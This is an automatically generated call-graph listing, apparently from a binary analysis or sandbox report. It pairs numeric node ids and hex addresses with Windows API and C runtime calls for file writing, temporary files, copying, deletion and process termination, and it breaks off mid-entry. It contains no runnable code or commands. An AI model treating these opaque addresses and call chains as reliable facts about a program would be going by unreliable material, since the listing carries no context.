109554->109697 109557 c8f830 109701 c8889e 47 API calls __getptd_noexit 109557->109701 109560 c8b6a0 ___lock_fhandle 49 API calls 109558->109560 109562 c8f7de 109560->109562 109561 c8f838 109702 c87aa0 8 API calls __mbsnbicoll_l 109561->109702 109564 c8f7fc 109562->109564 109565 c8f7f1 109562->109565 109698 c8889e 47 API calls __getptd_noexit 109564->109698 109681 c8f84c 109565->109681 109568 c8f7a3 __tzset_nolock 109568->109526 109569 c8f7f7 109699 c8f823 LeaveCriticalSection __unlock_fhandle 109569->109699 109571->109517 109572->109520 109574 c8bd20 __tzset_nolock 109573->109574 109575 c8bd28 109574->109575 109576 c8bd40 109574->109576 109671 c8886a 47 API calls __getptd_noexit 109575->109671 109577 c8bdd5 109576->109577 109582 c8bd72 109576->109582 109676 c8886a 47 API calls __getptd_noexit 109577->109676 109579 c8bd2d 109672 c8889e 47 API calls __getptd_noexit 109579->109672 109598 c8b6a0 109582->109598 109583 c8bdda 109677 c8889e 47 API calls __getptd_noexit 109583->109677 109584 c8bd35 __tzset_nolock 109584->109536 109587 c8bd78 109589 c8bd8b 109587->109589 109590 c8bd9e 109587->109590 109588 c8bde2 109678 c87aa0 8 API calls __mbsnbicoll_l 109588->109678 109607 c8bdf6 109589->109607 109673 c8889e 47 API calls __getptd_noexit 109590->109673 109594 c8bda3 109674 c8886a 47 API calls __getptd_noexit 109594->109674 109595 c8bd97 109675 c8bdcd LeaveCriticalSection __unlock_fhandle 109595->109675 109599 c8b6ac __tzset_nolock 109598->109599 109600 c8b6f9 EnterCriticalSection 109599->109600 109601 c88984 __lock 47 API calls 109599->109601 109602 c8b71f __tzset_nolock 109600->109602 109603 c8b6d0 109601->109603 109602->109587 109604 c8b6db InitializeCriticalSectionAndSpinCount 109603->109604 109605 c8b6ed 109603->109605 109604->109605 109606 c8b723 ___lock_fhandle LeaveCriticalSection 109605->109606 109606->109600 109608 c8be03 __ftell_nolock 109607->109608 109609 c8be35 109608->109609 109610 c8be5f 109608->109610 109611 c8be40 109608->109611 109612 c8b4bf __atodbl_l 6 API calls 109609->109612 109614 c8beb8 109610->109614 109615 c8be9c 109610->109615 109613 c8886a __set_osfhnd 47 API calls 109611->109613 109616 c8c61e 109612->109616 109617 c8be45 109613->109617 109619 c8becf 109614->109619 109621 c905df __lseeki64_nolock 49 API calls 109614->109621 109618 c8886a __set_osfhnd 47 API calls 109615->109618 109616->109595 109620 c8889e __mbsnbicoll_l 47 API calls 109617->109620 109624 c8bea1 109618->109624 109623 c949a2 __flswbuf 47 API calls 109619->109623 109622 c8be4c 109620->109622 109621->109619 109625 c87aa0 __mbsnbicoll_l 8 API calls 109622->109625 109629 c8bedd 109623->109629 109626 c8889e __mbsnbicoll_l 47 API calls 109624->109626 109625->109609 109628 c8bea8 109626->109628 109627 c8c1fe 109630 c8c56b WriteFile 109627->109630 109631 c8c216 109627->109631 109632 c87aa0 __mbsnbicoll_l 8 API calls 109628->109632 109629->109627 109634 c8869d __beginthread 47 API calls 109629->109634 109633 c8c594 GetLastError 109630->109633 109640 c8c1c3 109630->109640 109635 c8c30d 109631->109635 109642 c8c22c 109631->109642 109632->109609 109633->109640 109636 c8bf03 GetConsoleMode 109634->109636 109645 c8c416 109635->109645 109648 c8c318 109635->109648 109636->109627 109638 c8bf3c 109636->109638 109637 c8c5ce 109637->109609 109639 c8889e __mbsnbicoll_l 47 API calls 109637->109639 109638->109627 109641 c8bf4c GetConsoleCP 109638->109641 109646 c8c5f6 109639->109646 109640->109609 109640->109637 109647 c8c5aa 109640->109647 109641->109640 109669 c8bf75 109641->109669 109642->109637 109643 c8c29c WriteFile 109642->109643 109643->109633 109644 c8c2d9 109643->109644 109644->109640 109644->109642 109654 c8c308 109644->109654 109645->109637 109649 c8c48b WideCharToMultiByte 109645->109649 109650 c8886a __set_osfhnd 47 API calls 109646->109650 109651 c8c5b1 109647->109651 109652 c8c5c5 109647->109652 109648->109637 109653 c8c391 WriteFile 109648->109653 109649->109633 109663 c8c4d2 109649->109663 109650->109609 109655 c8889e __mbsnbicoll_l 47 API calls 109651->109655 109656 c8887d __dosmaperr 47 API calls 109652->109656 109653->109633 109657 c8c3e0 109653->109657 109654->109640 109659 c8c5b6 109655->109659 109656->109609 109657->109640 109657->109648 109657->109654 109658 c8c4da WriteFile 109661 c8c52d GetLastError 109658->109661 109658->109663 109662 c8886a __set_osfhnd 47 API calls 109659->109662 109660 c822a8 __chsize_nolock 57 API calls 109660->109669 109661->109663 109662->109609 109663->109640 109663->109645 109663->109654 109663->109658 109664 c96634 WriteConsoleW CreateFileW __chsize_nolock 109667 c8c0a9 109664->109667 109665 c94ea7 59 API calls __chsize_nolock 109665->109669 109666 c8c042 WideCharToMultiByte 109666->109640 109668 c8c07d WriteFile 109666->109668 109667->109633 109667->109640 109667->109664 109667->109669 109670 c8c0d4 WriteFile 109667->109670 109668->109633 109668->109667 109669->109640 109669->109660 109669->109665 109669->109666 109669->109667 109670->109633 109670->109667 109671->109579 109672->109584 109673->109594 109674->109595 109675->109584 109676->109583 109677->109588 109678->109584 109679->109545 109680->109547 109703 c8b957 109681->109703 109683 c8f85a 109684 c8f8b0 109683->109684 109686 c8f88e 109683->109686 109689 c8b957 __lseeki64_nolock 47 API calls 109683->109689 109716 c8b8d1 48 API calls 2 library calls 109684->109716 109686->109684 109687 c8b957 __lseeki64_nolock 47 API calls 109686->109687 109691 c8f89a CloseHandle 109687->109691 109688 c8f8b8 109692 c8f8da 109688->109692 109717 c8887d 47 API calls 3 library calls 109688->109717 109690 c8f885 109689->109690 109693 c8b957 __lseeki64_nolock 47 API calls 109690->109693 109691->109684 109694 c8f8a6 GetLastError 109691->109694 109692->109569 109693->109686 109694->109684 109696->109554 109697->109568 109698->109569 109699->109568 109700->109557 109701->109561 109702->109568 109704 c8b962 109703->109704 109705 c8b977 109703->109705 109706 c8886a __set_osfhnd 47 API calls 109704->109706 109708 c8886a __set_osfhnd 47 API calls 109705->109708 109710 c8b99c 109705->109710 109707 c8b967 109706->109707 109709 c8889e __mbsnbicoll_l 47 API calls 109707->109709 109711 c8b9a6 109708->109711 109714 c8b96f 109709->109714 109710->109683 109712 c8889e __mbsnbicoll_l 47 API calls 109711->109712 109713 c8b9ae 109712->109713 109715 c87aa0 __mbsnbicoll_l 8 API calls 109713->109715 109714->109683 109715->109714 109716->109688 109717->109692 109718->109158 109719->109161 109720->109165 109721->109171 109722->109179 109723->109181 109724->109177 109725->109185 109726->109189 109727->109205 109728->109201 109730 c631c7 109729->109730 109731 cd4aa5 GetFullPathNameW 109729->109731 109786 c63bcf 109730->109786 109734 cd4abd 109731->109734 109733 c631cd GetFullPathNameW 109735 c631e7 109733->109735 109734->109734 109735->109022 109737 c63a8b SHGetDesktopFolder 109736->109737 109740 c63ade 109736->109740 109738 c63a99 109737->109738 109737->109740 109739 c63ac8 SHGetPathFromIDListW 109738->109739 109738->109740 109739->109740 109740->109025 109742 c63b72 109741->109742 109743 c63ba9 109741->109743 109744 c63bcf 48 API calls 109742->109744 109743->109742 109745 c81bc7 _W_store_winword 59 API calls 109743->109745 109748 cd33e5 109743->109748 109746 c63b7d 109744->109746 109745->109743 109790 c6197e 109746->109790 109750 c6197e 48 API calls 109751 c63b9f 109750->109751 109752 c63dcb 109751->109752 109753 c63f9b 136 API calls 109752->109753 109754 c63def 109753->109754 109755 cd39f9 109754->109755 109756 c63f9b 136 API calls 109754->109756 109757 cacc82 122 API calls 109755->109757 109758 c63e02 109756->109758 109759 cd3a0e 109757->109759 109758->109755 109760 c63e0a 109758->109760 109761 cd3a2f 109759->109761 109762 cd3a12 109759->109762 109764 c63e16 109760->109764 109765 cd3a1a 109760->109765 109763 c8010a 48 API calls 109761->109763 109766 c63e39 84 API calls 109762->109766 109785 cd3a74 Mailbox 109763->109785 109796 c6bdf0 163 API calls 8 library calls 109764->109796 109797 ca757b 87 API calls _wprintf 109765->109797 109766->109765 109769 cd3a28 109769->109761 109770 c63e2e 109770->109023 109771 cd3c24 109772 c828ca _free 47 API calls 109771->109772 109773 cd3c2c 109772->109773 109774 c63e39 84 API calls 109773->109774 109775 cd3c35 109774->109775 109779 c828ca _free 47 API calls 109775->109779 109780 c63e39 84 API calls 109775->109780 109803 ca32b0 86 API calls 4 library calls 109775->109803 109779->109775 109780->109775 109782 c6caee 48 API calls 109782->109785 109785->109771 109785->109775 109785->109782 109798 ca30ac 48 API calls _memmove 109785->109798 109799 ca2fcd 60 API calls 2 library calls 109785->109799 109800 caa525 48 API calls 109785->109800 109801 c6b6d0 48 API calls _memmove 109785->109801 109802 c6a870 48 API calls 109785->109802 109787 c63bd9 __NMSG_WRITE 109786->109787 109788 c8010a 48 API calls 109787->109788 109789 c63bee _wcscpy 109788->109789 109789->109733 109791 c61990 109790->109791 109795 c619af _memmove 109790->109795 109793 c8010a 48 API calls 109791->109793 109792 c8010a 48 API calls 109794 c619c6 109792->109794 109793->109795 109794->109750 109795->109792 109796->109770 109797->109769 109798->109785 109799->109785 109800->109785 109801->109785 109802->109785 109803->109775 109805 c6a72c 109804->109805 109806 c6a848 109804->109806 109805->109806 109807 c8010a 48 API calls 109805->109807 109806->109031 109808 c6a753 109807->109808 109809 c8010a 48 API calls 109808->109809 109814 c6a7c5 109809->109814 109814->109806 109817 c6ace0 91 API calls 2 library calls 109814->109817 109818 c6a870 48 API calls 109814->109818 109819 caa3ee 48 API calls 109814->109819 109820 c6b6d0 48 API calls _memmove 109814->109820 109815->109033 109816->109035 109817->109814 109818->109814 109819->109814 109820->109814 109822 c631a2 LoadImageW 109821->109822 109823 cd4ad8 EnumResourceNamesW 109821->109823 109824 c63118 RegisterClassExW 109822->109824 109823->109824 109825 c62f58 GetSysColorBrush RegisterClassExW RegisterWindowMessageW 109824->109825 109826 c62fe9 ImageList_Create LoadIconW ImageList_ReplaceIcon 109825->109826 109826->109050 109828 c6e80f 109827->109828 109829 c6e7fd 109827->109829 110027 cad520 86 API calls 4 library calls 109828->110027 110026 c6dcd0 346 API calls 2 library calls 109829->110026 109831 c6e806 109831->109112 109833 cd98e8 109833->109833 109835 c6ea20 109834->109835 109836 c6fa40 346 API calls 109835->109836 109838 c6ea89 109835->109838 109839 cd9919 109836->109839 109837 cd99bc 110032 cad520 86 API calls 4 library calls 109837->110032 109844 c6d3d2 48 API calls 109838->109844 109865 c6eb18 109838->109865 109869 c6ecd7 Mailbox 109838->109869 109839->109838 110029 cad520 86 API calls 4 library calls 109839->110029 109841 c6d3d2 48 API calls 109843 cd9997 109841->109843 110031 c81b2a 52 API calls __cinit 109843->110031 109846 cd9963 109844->109846 110030 c81b2a 52 API calls __cinit 109846->110030 109847 cd9d70 110041 cbe2fb 346 API calls Mailbox 109847->110041 109849 c6d380 55 API calls 109849->109869 109851 cd9ddf 110044 cbc235 346 API calls Mailbox 109851->110044 109853 cd9e49 110046 cad520 86 API calls 4 library calls 109853->110046 109854 c6fa40 346 API calls 109854->109869 109855 cad520 86 API calls 109855->109869 109856 cd9dc2 110043 cad520 86 API calls 4 library calls 109856->110043 109858 c714a0 48 API calls 109858->109869 109863 c6342c 48 API calls 109863->109869 109864 cd9df7 109883 c6ef0c Mailbox 109864->109883 110045 cad520 86 API calls 4 library calls 109864->110045 109865->109841 109865->109869 109869->109837 109869->109847 109869->109849 109869->109851 109869->109853 109869->109854 109869->109855 109869->109856 109869->109858 109869->109863 109870 c6f56f 109869->109870 109871 cd9a3c 109869->109871 109869->109883 110028 c6d805 48 API calls _memmove 109869->110028 110033 caa3ee 48 API calls 109869->110033 110034 cbede9 346 API calls 109869->110034 110039 c9a599 InterlockedDecrement 109869->110039 110040 cbf4df 346 API calls 109869->110040 109870->109883 110042 cad520 86 API calls 4 library calls 109870->110042 110035 cbd154 48 API calls 109871->110035 109873 cd9a48 109875 cd9a9b 109873->109875 109876 cd9a56 109873->109876 109879 cd9a91 Mailbox 109875->109879 110037 caafce 48 API calls 109875->110037 110036 caa485 48 API calls 109876->110036 109877 c6fa40 346 API calls 109877->109883 109879->109877 109881 cd9ad8 110038 c7df08 48 API calls 109881->110038 109883->109112 109885 c74537 109884->109885 109886 c7469f 109884->109886 109887 c74543 109885->109887 109888 cd7820 109885->109888 109889 c6caee 48 API calls 109886->109889 110094 c74040 346 API calls _memmove 109887->110094 110095 cbe713 346 API calls Mailbox 109888->110095 109896 c745e4 Mailbox 109889->109896 109892 cd782c 109893 c74639 Mailbox 109892->109893 110096 cad520 86 API calls 4 library calls 109892->110096 109893->109112 109895 c74559 109895->109892 109895->109893 109895->109896 109899 c63e39 84 API calls 109896->109899 110047 c7dd84 109896->110047 110050 cb01e4 109896->110050 110091 cc0bfa 109896->110091 109899->109893 109901->109112 110317 c6a9a0 109902->110317 109904 c736e7 109906 cda269 109904->109906 109907 c73778 109904->109907 109962 c73aa8 109904->109962 110335 cad520 86 API calls 4 library calls 109906->110335 110329 c7bc04 86 API calls 109907->110329 109911 cda3e9 110340 cad520 86 API calls 4 library calls 109911->110340 109912 c73793 109912->109962 109964 c7396b Mailbox _memmove 109912->109964 109965 cda68d 109912->109965 110322 c610e8 109912->110322 109916 cda289 109916->109911 109919 c6d2d2 53 API calls 109916->109919 109917 cda583 109921 c6fa40 346 API calls 109917->109921 109918 cda45c 110344 cad520 86 API calls 4 library calls 109918->110344 109922 cda2fb 109919->109922 109923 cda5b5 109921->109923 109924 cda40f 109922->109924 109925 cda303 109922->109925 109934 c6d380 55 API calls 109923->109934 109923->109962 110341 c7cf79 49 API calls 109924->110341 109936 cda317 109925->109936 109947 cda341 109925->109947 109927 c7384e 109931 cda60c 109927->109931 109932 c738e5 109927->109932 109927->109964 110350 cad231 50 API calls 109931->110350 109937 c8010a 48 API calls 109932->109937 109938 cda5e6 109934->109938 109935 cda42c 109941 cda44d 109935->109941 109942 cda441 109935->109942 110336 cad520 86 API calls 4 library calls 109936->110336 109952 c738ec 109937->109952 110349 cad520 86 API calls 4 library calls 109938->110349 109939 c6fa40 346 API calls 109939->109964 110343 cad520 86 API calls 4 library calls 109941->110343 110342 cad520 86 API calls 4 library calls 109942->110342 109944 c7bc5c 48 API calls 109944->109964 109949 cda366 109947->109949 109953 cda384 109947->109953 110337 cbf211 346 API calls 109949->110337 109957 c6e1f0 346 API calls 109952->109957 109958 c7399f 109952->109958 109955 cda37a 109953->109955 110338 cbf4df 346 API calls 109953->110338 109954 c8010a 48 API calls 109954->109964 109955->109962 110339 c7baef 48 API calls _memmove 109955->110339 109957->109964 109961 c739c0 109958->109961 110351 c6c935 48 API calls 109958->110351 109961->109962 109966 cda65e 109961->109966 109968 c73a05 109961->109968 109971 c73ab5 Mailbox 109962->109971 110334 cad520 86 API calls 4 library calls 109962->110334 109964->109916 109964->109917 109964->109918 109964->109938 109964->109939 109964->109944 109964->109954 109964->109958 109964->109962 110331 c6d500 53 API calls __cinit 109964->110331 110332 c6d420 53 API calls 109964->110332 110333 c7baef 48 API calls _memmove 109964->110333 110345 cbd21a 82 API calls Mailbox 109964->110345 110346 ca89e0 53 API calls 109964->110346 110347 c6d772 55 API calls 109964->110347 110348 c6d89e 50 API calls Mailbox 109964->110348 109965->109962 110353 cad520 86 API calls 4 library calls 109965->110353 110352 c6d89e 50 API calls Mailbox 109966->110352 109968->109962 109968->109965 109969 c73a95 109968->109969 110330 c6d89e 50 API calls Mailbox 109969->110330 109971->109112 109972->109112 109973->109112 109974->109064 109975->109058 109976->109063 109977->109112 109978->109112 109979->109112 109980->109107 109981->109107 109982->109107 109984 c6fa60 109983->109984 110007 c6fa8e Mailbox _memmove 109983->110007 109985 c8010a 48 API calls 109984->109985 109985->110007 109986 c7105e 110409 c6c935 48 API calls 109986->110409 109988 c71230 110005 c6fbf1 Mailbox 109988->110005 110412 cad520 86 API calls 4 library calls 109988->110412 109991 c70119 110414 cad520 86 API calls 4 library calls 109991->110414 109992 c8010a 48 API calls 109992->110007 109993 c81b2a 52 API calls __cinit 109993->110007 109994 c71063 110413 cad520 86 API calls 4 library calls 109994->110413 109995 c70dee 110403 c6d89e 50 API calls Mailbox 109995->110403 109997 c70dfa 110404 c6d89e 50 API calls Mailbox 109997->110404 109999 cdb772 110415 cad520 86 API calls 4 library calls 109999->110415 110000 c6c935 48 API calls 110000->110007 110004 c6d3d2 48 API calls 110004->110007 110005->109112 110006 c70e83 110009 c6caee 48 API calls 110006->110009 110007->109986 110007->109988 110007->109991 110007->109992 110007->109993 110007->109994 110007->109995 110007->109997 110007->109999 110007->110000 110007->110004 110007->110005 110007->110006 110014 c6fa40 346 API calls 110007->110014 110016 c710f1 Mailbox 110007->110016 110018 cdb583 110007->110018 110020 c9a599 InterlockedDecrement 110007->110020 110021 cc0bfa 129 API calls 110007->110021 110355 cc4e5b 110007->110355 110401 c6f6d0 346 API calls 2 library calls 110007->110401 110402 c71620 59 API calls Mailbox 110007->110402 110405 cbee52 82 API calls 2 library calls 110007->110405 110406 cbef9d 90 API calls Mailbox 110007->110406 110407 cab020 48 API calls 110007->110407 110408 cbe713 346 API calls Mailbox 110007->110408 110009->110016 110010 cdb7d2 110014->110007 110411 cad520 86 API calls 4 library calls 110016->110411 110410 cad520 86 API calls 4 library calls 110018->110410 110020->110007 110021->110007 110023->109107 110024->109107 110025->109107 110026->109831 110027->109833 110028->109869 110029->109838 110030->109865 110031->109869 110032->109883 110033->109869 110034->109869 110035->109873 110036->109879 110037->109881 110038->109879 110039->109869 110040->109869 110041->109870 110042->109883 110043->109883 110044->109864 110045->109883 110046->109883 110097 c7dd92 GetFileAttributesW 110047->110097 110051 cb020d 110050->110051 110052 cb0218 110050->110052 110183 c6cdb4 48 API calls 110051->110183 110102 c684a6 110052->110102 110055 cb0232 110056 cb0366 110055->110056 110057 cb033c 110055->110057 110058 cb0254 110055->110058 110056->109893 110059 c63f9b 136 API calls 110057->110059 110060 c684a6 81 API calls 110058->110060 110061 cb034d 110059->110061 110066 cb0260 _wcscpy _wcschr 110060->110066 110062 cb0362 110061->110062 110064 c63f9b 136 API calls 110061->110064 110062->110056 110063 c684a6 81 API calls 110062->110063 110065 cb039b 110063->110065 110064->110062 110067 c8297d __wsplitpath 47 API calls 110065->110067 110070 cb0284 _wcscat _wcscpy 110066->110070 110073 cb02b2 _wcscat 110066->110073 110075 cb03bf _wcscat _wcscpy 110067->110075 110068 c684a6 81 API calls 110069 cb02d0 _wcscpy 110068->110069 110184 ca7c0c GetFileAttributesW 110069->110184 110071 c684a6 81 API calls 110070->110071 110071->110073 110073->110068 110074 cb02f0 __NMSG_WRITE 110074->110056 110076 c684a6 81 API calls 110074->110076 110079 c684a6 81 API calls 110075->110079 110077 cb031c 110076->110077 110185 ca6b3f 77 API calls 4 library calls 110077->110185 110081 cb0456 110079->110081 110080 cb0330 110080->110056 110122 ca7334 110081->110122 110083 cb0476 110084 c7dd84 3 API calls 110083->110084 110085 cb0485 110084->110085 110086 c684a6 81 API calls 110085->110086 110088 cb04b6 110085->110088 110087 cb049f 110086->110087 110128 cac890 110087->110128 110090 c63e39 84 API calls 110088->110090 110090->110056 110231 cbf79f 110091->110231 110093 cc0c0a 110093->109893 110094->109895 110095->109892 110096->109893 110098 cd4a7d FindFirstFileW 110097->110098 110099 c7dd89 110097->110099 110100 cd4a8e 110098->110100 110101 cd4a95 FindClose 110098->110101 110099->109893 110100->110101 110103 c684be 110102->110103 110117 c684ba 110102->110117 110104 cd5592 __i64tow 110103->110104 110105 c684d2 110103->110105 110106 cd5494 110103->110106 110113 c684ea __itow Mailbox _wcscpy 110103->110113 110186 c8234b 80 API calls 3 library calls 110105->110186 110107 cd549d 110106->110107 110108 cd557a 110106->110108 110107->110113 110114 cd54bc 110107->110114 110187 c8234b 80 API calls 3 library calls 110108->110187 110110 c8010a 48 API calls 110112 c684f4 110110->110112 110116 c6caee 48 API calls 110112->110116 110112->110117 110113->110110 110115 c8010a 48 API calls 110114->110115 110118 cd54d9 110115->110118 110116->110117 110117->110055 110119 c8010a 48 API calls 110118->110119 110120 cd54ff 110119->110120 110120->110117 110121 c6caee 48 API calls 110120->110121 110121->110117 110123 ca7341 _wcschr __ftell_nolock 110122->110123 110124 c8297d __wsplitpath 47 API calls 110123->110124 110127 ca7357 _wcscat _wcscpy 110123->110127 110125 ca7389 110124->110125 110126 c8297d __wsplitpath 47 API calls 110125->110126 110126->110127 110127->110083 110129 cac89d __ftell_nolock 110128->110129 110130 c8010a 48 API calls 110129->110130 110131 cac8fa 110130->110131 110132 c64bce 48 API calls 110131->110132 110133 cac904 110132->110133 110188 cac6a0 110133->110188 110135 cac90f 110136 c641a7 83 API calls 110135->110136 110137 cac922 _wcscmp 110136->110137 110138 cac9f3 110137->110138 110139 cac946 110137->110139 110209 cace59 94 API calls 2 library calls 110138->110209 110208 cace59 94 API calls 2 library calls 110139->110208 110142 cac94b 110143 c8297d __wsplitpath 47 API calls 110142->110143 110145 cac9fc 110142->110145 110148 cac974 _wcscat _wcscpy 110143->110148 110144 c6417d 64 API calls 110146 caca18 110144->110146 110145->110088 110147 c6417d 64 API calls 110146->110147 110149 caca28 110147->110149 110151 c8297d __wsplitpath 47 API calls 110148->110151 110150 c6417d 64 API calls 110149->110150 110152 caca43 110150->110152 110156 cac9bf _wcscat 110151->110156 110153 c6417d 64 API calls 110152->110153 110154 caca53 110153->110154 110155 c6417d 64 API calls 110154->110155 110157 caca6e 110155->110157 110156->110144 110156->110145 110158 c6417d 64 API calls 110157->110158 110159 caca7e 110158->110159 110160 c6417d 64 API calls 110159->110160 110161 caca8e 110160->110161 110162 c6417d 64 API calls 110161->110162 110163 caca9e 110162->110163 110191 cad009 GetTempPathW GetTempFileNameW 110163->110191 110165 cacaaa 110166 c84129 117 API calls 110165->110166 110168 cacabb 110166->110168 110167 c84274 __fcloseall 83 API calls 110169 cacb80 110167->110169 110168->110145 110170 c6417d 64 API calls 110168->110170 110180 cacb75 110168->110180 110192 c8373e 110168->110192 110171 cacb9a 110169->110171 110172 cacb86 DeleteFileW 110169->110172 110170->110168 110173 cacc2e CopyFileW 110171->110173 110177 cacba4 110171->110177 110172->110145 110174 cacc56 DeleteFileW 110173->110174 110175 cacc44 DeleteFileW 110173->110175 110205 cacfc8 CreateFileW 110174->110205 110175->110145 110210 cac251 118 API calls __fcloseall 110177->110210 110180->110167 110181 cacc19 110181->110174 110182 cacc1d DeleteFileW 110181->110182 110182->110145 110183->110052 110184->110074 110185->110080 110186->110113 110187->110113 110211 c840da GetSystemTimeAsFileTime 110188->110211 110190 cac6af 110190->110135 110191->110165 110193 c8374a __tzset_nolock 110192->110193 110194 c8377c 110193->110194 110195 c83764 110193->110195 110196 c83774 __tzset_nolock 110193->110196 110197 c85a9f __lock_file 48 API calls 110194->110197 110225 c8889e 47 API calls __getptd_noexit 110195->110225 110196->110168 110200 c83782 110197->110200 110199 c83769 110226 c87aa0 8 API calls __mbsnbicoll_l 110199->110226 110213 c835e7 110200->110213 110206 cacfee SetFileTime CloseHandle 110205->110206 110207 cad004 110205->110207 110206->110207 110207->110145 110208->110142 110209->110156 110210->110181 110212 c84108 __aulldiv 110211->110212 110212->110190 110216 c835f6 110213->110216 110222 c83614 110213->110222 110214 c83604 110228 c8889e 47 API calls __getptd_noexit 110214->110228 110216->110214 110219 c8362c _memmove 110216->110219 110216->110222 110217 c83609 110229 c87aa0 8 API calls __mbsnbicoll_l 110217->110229 110221 c83914 __flush 78 API calls 110219->110221 110219->110222 110223 c835c3 __flswbuf 47 API calls 110219->110223 110224 c8bd14 __flswbuf 78 API calls 110219->110224 110230 c89af3 78 API calls 4 library calls 110219->110230 110221->110219 110227 c837b4 LeaveCriticalSection LeaveCriticalSection _fprintf 110222->110227 110223->110219 110224->110219 110225->110199 110226->110196 110227->110196 110228->110217 110229->110222 110230->110219 110232 c684a6 81 API calls 110231->110232 110233 cbf7db 110232->110233 110248 cbf81d Mailbox 110233->110248 110267 cc0458 110233->110267 110235 cbfa7c 110236 cbfbeb 110235->110236 110240 cbfa86 110235->110240 110303 cc0579 89 API calls Mailbox 110236->110303 110239 cbfbf8 110239->110240 110241 cbfc04 110239->110241 110280 cbf5fb 110240->110280 110241->110248 110242 c684a6 81 API calls 110249 cbf875 Mailbox 110242->110249 110247 cbfaba 110294 c7f92c 110247->110294 110248->110093 110249->110235 110249->110242 110249->110248 110298 cc28d9 48 API calls _memmove 110249->110298 110299 cbfc96 60 API calls 2 library calls 110249->110299 110252 cbfaee 110255 c63320 48 API calls 110252->110255 110253 cbfad4 110300 cad520 86 API calls 4 library calls 110253->110300 110257 cbfb05 110255->110257 110256 cbfadf GetCurrentProcess TerminateProcess 110256->110252 110258 c714a0 48 API calls 110257->110258 110266 cbfb2f 110257->110266 110260 cbfb1e 110258->110260 110259 cbfc56 110259->110248 110263 cbfc6f FreeLibrary 110259->110263 110301 cc0300 105 API calls _free 110260->110301 110261 c714a0 48 API calls 110261->110266 110263->110248 110266->110259 110266->110261 110302 c6d89e 50 API calls Mailbox 110266->110302 110304 cc0300 105 API calls _free 110266->110304 110268 c6b8a7 48 API calls 110267->110268 110269 cc0473 CharLowerBuffW 110268->110269 110305 cb267a 110269->110305 110273 c6d3d2 48 API calls 110274 cc04ac 110273->110274 110312 c67f40 48 API calls _memmove 110274->110312 110276 cc04c3 110277 c6a2fb 48 API calls 110276->110277 110278 cc04cf Mailbox 110277->110278 110279 cc050b Mailbox 110278->110279 110313 cbfc96 60 API calls 2 library calls 110278->110313 110279->110249 110281 cbf616 110280->110281 110285 cbf66b 110280->110285 110282 c8010a 48 API calls 110281->110282 110283 cbf638 110282->110283 110284 c8010a 48 API calls 110283->110284 110283->110285 110284->110283 110286 cc0719 110285->110286 110287 cc0944 Mailbox 110286->110287 110293 cc073c _strcat _wcscpy __NMSG_WRITE 110286->110293 110287->110247 110288 c6d00b 58 API calls 110288->110293 110289 c6cdb4 48 API calls 110289->110293 110290 c684a6 81 API calls 110290->110293 110291 c845ec 47 API calls __malloc_crt 110291->110293 110293->110287 110293->110288 110293->110289 110293->110290 110293->110291 110316 ca8932 50 API calls __NMSG_WRITE 110293->110316 110295 c7f941 110294->110295 110296 c7f9d9 VirtualAlloc 110295->110296 110297 c7f9a7 110295->110297 110296->110297 110297->110252 110297->110253 110298->110249 110299->110249 110300->110256 110301->110266 110302->110266 110303->110239 110304->110266 110307 cb26a4 __NMSG_WRITE 110305->110307 110306 cb26e2 110306->110273 110306->110278 110307->110306 110308 cb26d8 110307->110308 110311 cb2763 110307->110311 110308->110306 110314 c7dfd2 60 API calls 110308->110314 110311->110306 110315 c7dfd2 60 API calls 110311->110315 110312->110276 110313->110279 110314->110308 110315->110311 110316->110293 110318 c6a9af 110317->110318 110321 c6a9ca 110317->110321 110319 c6b8a7 48 API calls 110318->110319 110320 c6a9b7 CharUpperBuffW 110319->110320 110320->110321 110321->109904 110323 cd4c5a 110322->110323 110324 c610f9 110322->110324 110325 c8010a 48 API calls 110324->110325 110326 c61100 110325->110326 110327 c61121 110326->110327 110354 c6113c 48 API calls 110326->110354 110327->109927 110329->109912 110330->109962 110331->109964 110332->109964 110333->109964 110334->109971 110335->109912 110336->109962 110337->109955 110338->109955 110339->109911 110340->109962 110341->109935 110342->109962 110343->109962 110344->109962 110345->109964 110346->109964 110347->109964 110348->109964 110349->109962 110350->109958 110351->109961 110352->109965 110353->109962 110354->110327 110356 c6d3d2 48 API calls 110355->110356 110357 cc4e76 110356->110357 110358 c684a6 81 API calls 110357->110358 110359 cc4e85 110358->110359 110360 c67b6e 48 API calls 110359->110360 110361 cc4e94 110360->110361 110362 c684a6 81 API calls 110361->110362 110363 cc4ea4 110362->110363 110364 cc4f2a 110363->110364 110365 cc4ec7 110363->110365 110366 c684a6 81 API calls 110364->110366 110416 c6cdb4 48 API calls 110365->110416 110368 cc4f2f 110366->110368 110370 c684a6 81 API calls 110368->110370 110369 cc4ecc 110371 cc4f57 110369->110371 110374 cc4ee3 110369->110374 110372 cc4f49 110370->110372 110428 c6ca8e 48 API calls 110371->110428 110372->110371 110375 cc4f79 110372->110375 110417 c67f40 48 API calls _memmove 110374->110417 110378 cc4f8f 110375->110378 110429 c6cdb4 48 API calls 110375->110429 110377 cc4ef0 110418 c67b4b 110377->110418 110381 cc4fa8 110378->110381 110430 c6cdb4 48 API calls 110378->110430 110385 cb267a 60 API calls 110381->110385 110395 cc4fdd 110381->110395 110383 cc4f64 Mailbox 110383->110007 110388 cc4fd7 110385->110388 110387 cc4f17 110389 c67b4b 48 API calls 110387->110389 110388->110395 110431 c67f40 48 API calls _memmove 110388->110431 110400 cc4f25 110389->110400 110390 cb267a 60 API calls 110390->110395 110392 cc5063 110433 c67f40 48 API calls _memmove 110392->110433 110395->110390 110395->110392 110397 c67b4b 48 API calls 110395->110397 110432 c67f40 48 API calls _memmove 110395->110432 110397->110395 110398 cc507e 110399 c67b4b 48 API calls 110398->110399 110399->110400 110434 c67bef 48 API calls 110400->110434 110401->110007 110402->110007 110403->109997 110404->110006 110405->110007 110406->110007 110407->110007 110408->110007 110409->110005 110410->110016 110411->110005 110412->109994 110413->109991 110414->109999 110415->110010 110416->110369 110417->110377 110419 cd240d 110418->110419 110420 c67b5d 110418->110420 110441 c9c0a2 48 API calls _memmove 110419->110441 110435 c6bbd9 110420->110435 110423 c67b69 110427 c67f40 48 API calls _memmove 110423->110427 110424 cd2417 110442 c6c935 48 API calls 110424->110442 110426 cd241f Mailbox 110427->110387 110428->110383 110429->110378 110430->110381 110431->110395 110432->110395 110433->110398 110434->110383 110436 c6bc0d _memmove 110435->110436 110437 c6bbe7 110435->110437 110436->110423 110436->110436 110437->110436 110438 c8010a 48 API calls 110437->110438 110439 c6bc5c 110438->110439 110440 c8010a 48 API calls 110439->110440 110440->110436 110441->110424 110442->110426 110443 33923b0 110457 